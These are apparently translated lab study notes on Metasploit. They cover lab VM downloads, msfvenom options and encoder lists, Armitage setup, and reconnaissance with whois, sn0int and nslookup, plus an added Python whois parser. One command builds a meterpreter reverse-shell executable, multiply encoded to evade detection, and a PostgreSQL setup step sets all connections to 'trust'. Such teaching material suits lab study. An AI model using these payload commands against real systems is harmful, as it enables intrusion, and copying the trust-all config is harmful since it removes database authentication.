Windows 2000 Professional
Link: https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm
Extraction code: upsm
Windows Server 2003 Standard x64 Edition
Link: https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb
Extraction code: ngsb
Windows 7 x64
Link: https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o
Extraction code: zp3o
Debian 6 (Kali Linux)
Link: https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5
Extraction code: s2i5
Apache, Tomcat, MySQL and vsftpd are installed, together with the accompanying web security testing exercise materials.
cd /usr/local/apache-tomcat-8.5.81/bin
./startup.sh
service mysql start
Open a browser and go to 127.0.0.1:8080/sec/
Metasploitable2-Linux (with vsftpd 2.3.4)
Link: https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6
Extraction code: 17g6
After extraction it is a vmx file and can be used directly.
Basic concepts
Communication protocols
ARP
ICMP
TCP
Terminology
Exploit
A tester uses it to attack a system, program or service in order to obtain a result the developer did not intend. Common kinds are memory overflows, web application vulnerability exploitation and misconfiguration exploits.
Payload
The program we want the attacked system to execute. A reverse shell, for example, establishes a connection back from the target machine to the tester, while a bind shell binds a channel for executing commands to the tester's machine. A payload can also be a program that runs a limited set of commands on the target machine.
Shellcode
A sequence of instructions used as the payload during an attack; after it executes on the target machine it usually provides a shell in which commands can be run.
Module
An MSF module, made up of a set of code.
Listener
A program on the tester's machine that waits for an incoming connection from the attacked machine.
Encoders
msfencode -l lists the available encoders; the most effective one is x86/shikata_ga_nai.
Metasploit user interfaces
MSF console
# msfconsole
msf6 > help connect
MSF command line
# msfconsole -x "script; set rhost [ip]; set lhost [ip]; set PAYLOAD …; run"
# msfconsole -r path/xxx.rc
Armitage
Installation
Download Armitage: https://gitlab.com/kalilinux/packages/armitage
Extract armitage
# cd armitage
# ./package.sh
# cd release
# ll
drwxr-xr-x 2 root root 4096 6月 29 18:40 unix
drwxr-xr-x 2 root root 4096 6月 29 18:40 windows
# cd /etc/postgresql/14/main/
# gedit pg_hba.conf
Comment out all of them:
# "local" is for Unix domain socket connections only
local   all   all                 trust
# IPv4 local connections:
host    all   all   127.0.0.1/32  trust
# IPv6 local connections:
host    all   all   ::1/128       trust

# service postgresql stop
# msfdb reinit
# service postgresql start
# cd /home/jerry/下载/armitage-kali-master/release/unix
# ./armitage
Generating the controlled end and the controlling end
Scanning
Metasploit utility programs
MSF payload generator
| Written in | Output language |
| --- | --- |
| Python | C |
| Web languages | JavaScript |
# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
| Short | Long | Description |
| --- | --- | --- |
| -l | --list | List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all |
| -p | --payload | Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom |
|  | --list-options | List --payload's standard, advanced and evasion options |
| -f | --format | Output format (use --list formats to list) |
| -e | --encoder | The encoder to use (use --list encoders to list) |
|  | --service-name | The service name to use when generating a service binary |
|  | --sec-name | The new section name to use when generating large Windows binaries. Default: random 4-character alpha string |
|  | --smallest | Generate the smallest possible payload using all available encoders |
|  | --encrypt | The type of encryption or encoding to apply to the shellcode (use --list encrypt to list) |
|  | --encrypt-key | A key to be used for --encrypt |
|  | --encrypt-iv | An initialization vector for --encrypt |
| -a | --arch | The architecture to use for --payload and --encoders (use --list archs to list) |
|  | --platform | The platform for --payload (use --list platforms to list) |
| -o | --out | Save the payload to a file |
| -b | --bad-chars | Characters to avoid, for example: '\x00\xff' |
| -n | --nopsled | Prepend a nopsled of [length] size on to the payload |
|  | --pad-nops | Use the nopsled size specified by -n as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) |
| -s | --space | The maximum size of the resulting payload |
|  | --encoder-space | The maximum size of the encoded payload (defaults to the -s value) |
| -i | --iterations | The number of times to encode the payload |
| -c | --add-code | Specify an additional win32 shellcode file to include |
| -x | --template | Specify a custom executable file to use as a template |
| -k | --keep | Preserve the --template behaviour and inject the payload as a new thread |
| -v | --var-name | Specify a custom variable name to use for certain output formats |
| -t | --timeout | The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) |
| -h | --help | Show this message |
MSF encoders
# msfvenom -l encoders
Framework Encoders [--encoder]
| Name | Rank | Description |
| --- | --- | --- |
| cmd/brace | low | Bash Brace Expansion Command Encoder |
| cmd/echo | good | Echo Command Encoder |
| cmd/generic_sh | manual | Generic Shell Variable Substitution Command Encoder |
| cmd/ifs | low | Bourne ${IFS} Substitution Command Encoder |
| cmd/perl | normal | Perl Command Encoder |
| cmd/powershell_base64 | excellent | Powershell Base64 Command Encoder |
| cmd/printf_php_mq | manual | printf(1) via PHP magic_quotes Utility Command Encoder |
| generic/eicar | manual | The EICAR Encoder |
| generic/none | normal | The "none" Encoder |
| mipsbe/byte_xori | normal | Byte XORi Encoder |
| mipsbe/longxor | normal | XOR Encoder |
| mipsle/byte_xori | normal | Byte XORi Encoder |
| mipsle/longxor | normal | XOR Encoder |
| php/base64 | great | PHP Base64 Encoder |
| ppc/longxor | normal | PPC LongXOR Encoder |
| ppc/longxor_tag | normal | PPC LongXOR Encoder |
| ruby/base64 | great | Ruby Base64 Encoder |
| sparc/longxor_tag | normal | SPARC DWORD XOR Encoder |
| x64/xor | normal | XOR Encoder |
| x64/xor_context | normal | Hostname-based Context Keyed Payload Encoder |
| x64/xor_dynamic | normal | Dynamic key XOR Encoder |
| x64/zutto_dekiru | manual | Zutto Dekiru |
| x86/add_sub | manual | Add/Sub Encoder |
| x86/alpha_mixed | low | Alpha2 Alphanumeric Mixedcase Encoder |
| x86/alpha_upper | low | Alpha2 Alphanumeric Uppercase Encoder |
| x86/avoid_underscore_tolower | manual | Avoid underscore/tolower |
| x86/avoid_utf8_tolower | manual | Avoid UTF8/tolower |
| x86/bloxor | manual | BloXor - A Metamorphic Block Based XOR Encoder |
| x86/bmp_polyglot | manual | BMP Polyglot |
| x86/call4_dword_xor | normal | Call+4 Dword XOR Encoder |
| x86/context_cpuid | manual | CPUID-based Context Keyed Payload Encoder |
| x86/context_stat | manual | stat(2)-based Context Keyed Payload Encoder |
| x86/context_time | manual | time(2)-based Context Keyed Payload Encoder |
| x86/countdown | normal | Single-byte XOR Countdown Encoder |
| x86/fnstenv_mov | normal | Variable-length Fnstenv/mov Dword XOR Encoder |
| x86/jmp_call_additive | normal | Jump/Call XOR Additive Feedback Encoder |
| x86/nonalpha | low | Non-Alpha Encoder |
| x86/nonupper | low | Non-Upper Encoder |
| x86/opt_sub | manual | Sub Encoder (optimised) |
| x86/service | manual | Register Service |
| x86/shikata_ga_nai | excellent | Polymorphic XOR Additive Feedback Encoder |
| x86/single_static_bit | manual | Single Static Bit |
| x86/unicode_mixed | manual | Alpha2 Alphanumeric Unicode Mixedcase Encoder |
| x86/unicode_upper | manual | Alpha2 Alphanumeric Unicode Uppercase Encoder |
| x86/xor_dynamic | normal | Dynamic key XOR Encoder |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF payloads
# msfvenom -l payloads
MSF NOPs
# msfvenom -l nops
Framework NOPs (11 total)
=========================
Name              Description
----              -----------
aarch64/simple    Simple NOP generator
armle/simple      Simple NOP generator
cmd/generic       Generates harmless padding for command payloads.
mipsbe/better     Better NOP generator
php/generic       Generates harmless padding for PHP scripts
ppc/simple        Simple NOP generator
sparc/random      SPARC NOP generator
tty/generic       Generates harmless padding for TTY input
x64/simple        An x64 single/multi byte NOP instruction generator.
x86/opty2         Opty2 multi-byte NOP generator
x86/single_byte   Single-byte NOP generator
MSF platforms
# msfvenom -l platforms
Framework Platforms [--platform]
========================================
Name
----
aix android apple_ios arista brocade bsd bsdi cisco firefox freebsd hardware hpux irix java javascript juniper linux mainframe mikrotik multi netbsd netware nodejs openbsd osx php python r ruby solaris unifi unix unknown windows
MSF architectures (for --payload and --encoders)
# msfvenom -l archs
Framework Architectures [--arch]
========================================
Name
----
aarch64 armbe armle cbea cbea64 cmd dalvik firefox java mips mips64 mips64le mipsbe mipsle nodejs php ppc ppc64 ppc64le ppce500v2 python r ruby sparc sparc64 tty x64 x86 x86_64 zarch
MSF encryption or encoding types applied to shellcode
# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
Name
----
aes256 base64 rc4 xor
MSF file formats
# msfvenom -l formats
Framework Executable Formats [--format]
===============================================
Name
----
asp aspx aspx-exe axis2 dll elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war
Framework Transform Formats [--format]
==============================================
Name
----
base32 base64 bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript
Viewing options
# msfvenom -p moduleName --list-options
For example:
msfvenom -p windows/shell_reverse_tcp --list-options
Nasm shell
Netwide Assembler (NASM) is an assembler and disassembler for the x86 architecture. It can be used to write 16-bit (8086, 80286, etc.), 32-bit (IA-32) and 64-bit (x86_64) programs, and it is considered one of the most popular assemblers on the Linux platform.
NASM was originally developed by Simon Tatham with assistance from Julian Hall. As of 2016 it is maintained by a small team led by H. Peter Anvin. It is open-source software released under the simplified (2-clause) BSD License.
# cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp
nasm >
Metasploit Express & Metasploit Pro
Information gathering
Passive information gathering
Whois
Format
msf > whois example.com
msf > whois 192.168.1.100
Example
msf6 > whois 3testing.com
[*] exec: whois 3testing.com
Domain Name: 3TESTING.COM
Registry Domain ID: 513017975_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-06-27T15:41:17Z
Creation Date: 2006-07-09T13:24:36Z
Registry Expiry Date: 2023-07-09T13:24:36Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
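Whois output such as the record above is far more useful once it is structured, for instance to keep an inventory of owned domains and flag ones approaching expiry. The following Python is an added example, not part of the original notes: it parses the "Key: value" lines (repeated keys such as Name Server are kept as lists, the ">>>" trailer is skipped) and summarises registrar, name servers, DNSSEC status and days until expiry; the embedded sample is copied from the 3testing.com output above.

```python
import re
from datetime import datetime, timezone

# Sample input: field lines copied from the whois output shown above
SAMPLE_WHOIS = """\
Domain Name: 3TESTING.COM
Registrar URL: http://www.net.cn
Registry Expiry Date: 2023-07-09T13:24:36Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
DNSSEC: unsigned
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
"""

# "Key: value"; the key is matched lazily so a URL in the value keeps its colon
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 /_-]*?):\s*(.*?)\s*$")
WHOIS_TIME = "%Y-%m-%dT%H:%M:%SZ"

def parse_whois(text):
    """Map each key to the list of its values (Name Server and similar keys repeat)."""
    record = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith((">>>", "%", "#")):
            continue  # blank lines, the trailer and registry comments carry no field
        m = FIELD_RE.match(line)
        if m:
            record.setdefault(m.group(1), []).append(m.group(2))
    return record

def summarize(record, today_iso=None):
    """Flatten the fields an asset inventory cares about; today_iso defaults to now (UTC)."""
    today = (datetime.strptime(today_iso, WHOIS_TIME).replace(tzinfo=timezone.utc)
             if today_iso else datetime.now(timezone.utc))
    expiry_raw = record.get("Registry Expiry Date", [None])[0]
    days = None
    if expiry_raw:  # a record without an expiry field reports None instead of failing
        expiry = datetime.strptime(expiry_raw, WHOIS_TIME).replace(tzinfo=timezone.utc)
        days = (expiry - today).days
    return {
        "domain": record["Domain Name"][0].lower(),
        "registrar": record.get("Registrar", ["unknown"])[0],
        "name_servers": sorted(ns.lower() for ns in record.get("Name Server", [])),
        "dnssec": record.get("DNSSEC", ["unknown"])[0],
        "days_to_expiry": days,
    }

if __name__ == "__main__":
    print(summarize(parse_whois(SAMPLE_WHOIS), "2022-06-20T04:09:37Z"))
```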
netcraft
https://searchdns.netcraft.com/
Maltego
sn0int
Installation
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc
# echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
# sn0int
[sn0int][default] > pkg quickstart
Usage
[sn0int][default] > workspace demo
[+] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com" : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com" : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com" : Adding subdomain "foundation.baidu.com"
[*] "baidu.com" : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com" : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "duke.baidu.com"
[*] "baidu.com" : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com" : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com" : Adding subdomain "trafficsafe.baidu.com"
ZoomEye
nslookup
msf6 > nslookup -type=mx example.com
Example
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server:         8.8.8.8
Address:        8.8.8.8#53
Non-authoritative answer:
Name:   www.3testing.com
Address: 123.56.135.186
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server:         192.168.0.1
Address:        192.168.0.1#53
Non-authoritative answer:
Name:   www.3testing.com
Address: 123.56.135.186